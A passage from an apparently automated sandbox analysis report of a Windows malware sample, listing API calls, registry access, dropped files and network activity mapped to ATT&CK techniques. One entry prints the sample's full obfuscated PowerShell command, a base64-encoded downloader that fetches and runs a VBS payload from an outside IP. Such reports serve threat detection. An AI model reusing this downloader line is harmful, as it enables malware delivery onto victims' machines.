\"csc.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter DllGetClassObjectInternal (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter StrongNameTokenFromPublicKey (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter StrongNameFreeBuffer (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CompareAssemblyIdentityWithConfig (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CreateAssemblyConfigCookie (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter DestroyAssemblyConfigCookie (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CreateAssemblyNameObject (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter InitializeSxS (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CreateICeeFileGen (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter DestroyICeeFileGen (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CoCreateGuid (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CreateStreamOnHGlobal (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CorExitProcess (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CorExitProcess_RetAddr (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005220)\n \"cvtres.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002728)\n \"cvtres.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002728)\n \"cvtres.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002728)\n \"cvtres.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002728)\n \"cvtres.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002728)\n \"cvtres.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00002728)\n \"cvtres.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00002728)\n \"cvtres.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00002728)\n \"cvtres.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00002728)\n \"cvtres.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002728)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"bbotlxd5.dll\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"powershell.exe\" called \"CreateDirectoryA\" with parameter %TEMP%\\bbotlxd5 (UID: 00000000-00006096)\n \"powershell.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00006096)\n \"powershell.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00006096)\n \"powershell.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00006096)\n \"powershell.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00006096)\n \"powershell.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00006096)\n \"powershell.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-20", "type": 3, "relevance": 5, "name": "Reads Windows Trust Settings", "description": "\"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING\"; Key: \"STATE\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-17", "type": 3, "relevance": 10, "name": "Accesses System Certificates Settings", "description": "\"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE\"; Key: \"DISALLOWEDCERTSYNCDELTATIME\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\MY\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\2E4916B07F3DE90C8DDE2566FD9B9B400D89BBBA\"; Key: \"BLOB\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\5AEAEE3F7F2A9449CEBAFEEC68FDD184F20124A7\"; Key: \"BLOB\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\E6A3B45B062D509B3382282D196EFE97D5956CCB\"; Key: \"BLOB\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\F5AD0BCC1AD56CD150725B1C866C30AD92EF21B0\"; Key: \"BLOB\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\109F1CAED645BB78B3EA2B94C0697C740733031C\"; Key: \"BLOB\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-3", "type": 7, "relevance": 5, "name": "Tries to GET non-existent files from a webserver", "description": "\"GET /430/goodgirlalwaysbeagoodgirlwithbetterpersongood.gIF HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\nHost: <IPv4>\nConnection: Keep-Alive\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-510", "type": 2, "relevance": 1, "name": "Commandline contains PowerShell", "description": "Commandline contains PowerShell string \"\"/c pOWershell.exe -ex bypASS -NOP -w 1 -C DeviCECredEnTiaLdeploYmeNt ; iEX($(IEx('[sYStEM.TEXT.encOdinG]'+[cHar]0x3a+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING('+[ChAr]34+'JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi'+[ChAr]34+'))')))\".......\" in [Source : cmd.exe]", "origin": "File/Memory", "attck_id": "T1059.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"bbotlxd5.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\bbotlxd5\\bbotlxd5.dll]- [targetUID: 00000000-00006096]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"cmd.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Desktop\\POWERSHELL.EXE\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\ATL.DLL\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\MSCOREE.DLL\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\CLR.DLL\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\MSCORWKS.DLL\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\CLR.DLL\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\MSCORWKS.DLL\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CLR.DLL\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-17", "type": 6, "relevance": 10, "name": "Scans for the windows taskbar (may be used for explorer injection)", "description": "\"iexplore.exe\" searching for class \"Shell_TrayWnd\"", "origin": "API Call", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"powershell.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"powershell.exe\" touched file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll.config\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll.config\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.pdb\"\n \"powershell.exe\" touched file \"C:\\Windows\\System.Management.Automation.pdb\"\n \"powershell.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"powershell.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache\"\n \"powershell.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"powershell.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"powershell.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\"\n \"powershell.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\"\n \"powershell.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive\"\n \"csc.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"csc.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"csc.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"csc.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"csc.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"powershell.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll.config\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll.config\"\n \"powershell.exe\" trying to access non-existent file \"\\DEVICE\\NETBT_TCPIP_{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"\n \"powershell.exe\" trying to access non-existent file \"\\DEVICE\\NETBT_TCPIP_{AC07BF4D-B150-47EB-A71E-488912826651}\"\n \"powershell.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"powershell.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"bbotlxd5.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\bbotlxd5\\bbotlxd5.dll]- [targetUID: 00000000-00006096]\n \"en-US.4\" has type \"data\"- [targetUID: N/A]\n \"~DFA5621E6042CFFF11.TMP\" has type \"data\"- [targetUID: N/A]\n \"~DF0FDB9CBDB3CFFFED.TMP\" has type \"data\"- [targetUID: N/A]\n \"ModuleAnalysisCache\" has type \"data\"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache]- [targetUID: 00000000-00006096]\n \"RecoveryStore._C0E1682E-E783-11EF-A0B1-005056918B5E_.dat\" has type \"Composite Document File V2 Document Cannot read section info\"- [targetUID: N/A]\n \"57C8EDB95DF3F0AD4EE2DC2B8CFD4157\" has type \"Microsoft Cabinet archive data Windows 2000/XP setup 4761 bytes 1 file at 0x2c +A \"disallowedcert.stl\" number 1 1 datablock 0x1 compression\"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00006096]\n \"_C0E16830-E783-11EF-A0B1-005056918B5E_.dat\" has type \"Composite Document File V2 Document Cannot read section info\"- [targetUID: N/A]\n \"RES9B07.tmp\" has type \"Intel 80386 COFF object file not stripped 3 sections symbol offset=0x492 9 symbols created Mon Feb 10 07:51:16 2025 1st section name \".debug$S\"\"- [targetUID: N/A]\n \"bbotlxd5.out\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (452) with CRLF CR line terminators\"- Location: [%TEMP%\\bbotlxd5\\bbotlxd5.out]- [targetUID: 00000000-00006096]\n \"CSCF43C3EF31D3408DB37A77EEBAE2248A.TMP\" has type \"MSVC .res\"- [targetUID: N/A]\n \"NACMJB4Y.txt\" has type \"ASCII text\"- [targetUID: N/A]\n \"3130B1871A126520A8C47861EFE3ED4D\" has type \"data\"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D]- [targetUID: 00000000-00006096]\n \"bbotlxd5.0.cs\" has type \"C++ source Unicode text UTF-8 (with BOM) text with very long lines (354)\"- Location: [%TEMP%\\bbotlxd5\\bbotlxd5.0.cs]- [targetUID: 00000000-00006096]\n \"HJW2BZHK.txt\" has type \"ASCII text\"- [targetUID: N/A]\n \"bbotlxd5.cmdline\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (370) with no line terminators\"- Location: [%TEMP%\\bbotlxd5\\bbotlxd5.cmdline]- [targetUID: 00000000-00006096]\n \"CZCV38S8.txt\" has type \"ASCII text\"- [targetUID: N/A]\n \"57C8EDB95DF3F0AD4EE2DC2B8CFD4157\" has type \"data\"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00006096]\n \"F14EIX80.txt\" has type \"ASCII text\"- [targetUID: N/A]\n \"75QVAP73.txt\" has type \"ASCII text\"- [targetUID: N/A]\n \"3130B1871A126520A8C47861EFE3ED4D\" has type \"data\"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D]- [targetUID: 00000000-00006096]\n \"MRB2F9MY.txt\" has type \"ASCII text\"- [targetUID: N/A]\n \"RUM8NQ4B.txt\" has type \"ASCII text\"- [targetUID: N/A]\n \"7LVHHM0J.txt\" has type \"ASCII text\"- [targetUID: N/A]\n \"JJX2DA1F.txt\" has type \"ASCII text\"- [targetUID: N/A]\n \"SBWASSX3.txt\" has type \"ASCII text\"- [targetUID: N/A]\n \"EKKMVVLN.txt\" has type \"ASCII text\"- [targetUID: N/A]\n \"StartupProfileData-NonInteractive\" has type \"data\"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive]- [targetUID: 00000000-00006096]\n \"suggestions_1_.en-US\" has type \"data\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-121", "type": 6, "relevance": 3, "name": "Calls an API typically used to remove a directory", "description": "\"powershell.exe\" called \"RemoveDirectoryW\" with parameter %TEMP%\\bbotlxd5 (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"powershell.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002724)\n \"powershell.exe\" called \"GetLocaleInfoW\" with parameter \"9\" - (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"LEVELS\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"DEFAULTLEVEL\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"SAFERFLAGS\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"POLICYSCOPE\")\n \"powershell.exe\" (Path: 